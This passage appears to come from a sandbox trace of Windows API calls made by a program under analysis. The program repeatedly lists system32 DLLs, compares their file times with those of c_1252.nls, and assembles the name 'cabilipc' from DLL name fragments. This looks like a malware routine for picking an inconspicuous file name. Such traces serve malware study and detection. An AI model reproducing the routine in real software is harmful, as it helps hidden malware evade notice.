CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.899] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.899] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.899] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.899] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.899] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.899] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.899] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.899] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.899] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.899] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.899] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.900] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.900] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.900] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.900] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.900] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.900] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.900] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.900] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.900] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.900] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.900] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.900] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.900] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.900] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.900] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.900] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.900] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.900] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.900] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.900] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.900] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.900] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.900] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.900] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.900] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.900] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.900] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.900] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.900] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.900] StrChrA (lpStart="Clipc.dll", wMatch=0x2e) returned=".dll" [0075.900] FindNextFileA (in: hFindFile=0x61ea48, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.900] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.900] FindClose (in: hFindFile=0x61ea48 | out: hFindFile=0x61ea48) returned 1 [0075.900] lstrlenA (lpString="cabilipc") returned 8 [0075.901] mbstowcs (in: _Dest=0x22286d0, _Source="cabilipc", _MaxCount=0xe | out: _Dest="cabilipc") returned 0x8 [0075.901] ExpandEnvironmentStringsA (in: lpSrc="%systemroot%\\system32\\c_1252.nls", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x20 [0075.901] ExpandEnvironmentStringsA (in: lpSrc="%systemroot%\\system32\\c_1252.nls", lpDst=0x2228710, nSize=0x20 | out: lpDst="C:\\Windows\\system32\\c_1252.nls") returned 0x1f [0075.901] CreateFileA (lpFileName="C:\\Windows\\system32\\c_1252.nls" (normalized: "c:\\windows\\system32\\c_1252.nls"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0075.901] GetFileTime (in: hFile=0x174, lpCreationTime=0x5dfeac, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x5dfeac*(dwLowDateTime=0x9656d311, dwHighDateTime=0x1d0baff), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0075.901] CloseHandle (hObject=0x174) returned 1 [0075.901] StrRChrA (lpStart="C:\\Windows\\system32\\c_1252.nls", lpEnd=0x0, wMatch=0x5c) returned="\\c_1252.nls" [0075.901] lstrcatA (in: lpString1="C:\\Windows\\system32", lpString2="\\*.dll" | out: lpString1="C:\\Windows\\system32\\*.dll") returned="C:\\Windows\\system32\\*.dll" [0075.901] FindFirstFileA (in: lpFileName="C:\\Windows\\system32\\*.dll", lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 0x61e9c8 [0075.904] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.904] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.904] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.904] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.904] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.904] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.904] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.904] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.904] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.904] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.904] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.904] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.904] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.904] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.904] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.904] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.904] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.905] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.905] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.905] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.905] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.905] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.905] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.905] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.905] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.905] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.905] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.905] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.905] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.905] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.905] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.905] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.905] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.905] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.905] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.905] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.905] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.905] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.905] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.905] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.905] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.905] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.905] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.905] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.905] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.905] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.905] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.905] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.905] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.905] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.905] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.905] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.905] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.905] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.905] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.905] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.905] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.905] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.905] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.905] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.906] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.906] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.906] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.906] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.906] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.906] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.906] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.906] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.906] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.906] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.906] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.906] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.906] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.906] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.906] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.906] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.906] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.906] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.906] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.906] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.906] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.906] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.906] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.906] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.906] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.906] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.906] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.906] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.906] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.906] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.906] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.906] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.906] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.906] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.906] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.906] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.906] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.906] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.906] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.906] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.906] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.906] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.907] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.907] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.907] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.907] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.907] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.907] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.907] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.907] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.907] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.907] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.907] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.907] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.907] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.907] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.907] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.907] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.907] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.907] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.907] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.907] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.907] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.907] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.907] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.907] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.907] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.907] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.907] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.907] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.907] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.907] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.907] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.907] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.907] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.907] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.907] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.907] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.907] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.907] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.907] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.907] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.907] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.907] StrChrA (lpStart="autoplay.dll", wMatch=0x2e) returned=".dll" [0075.908] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.908] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.908] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.908] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.908] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.908] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.908] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.908] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.908] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.908] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.908] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.908] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.908] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.908] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.908] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.908] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.908] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.908] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.908] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.908] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.908] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.908] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.908] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.908] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.908] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.908] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.908] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.908] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.908] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.908] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.908] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.908] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.908] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.908] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.908] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.908] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.908] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.908] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.908] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.908] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.908] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.908] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.908] FindNextFileA (in: hFindFile=0x61e9c8, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.908] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.909] 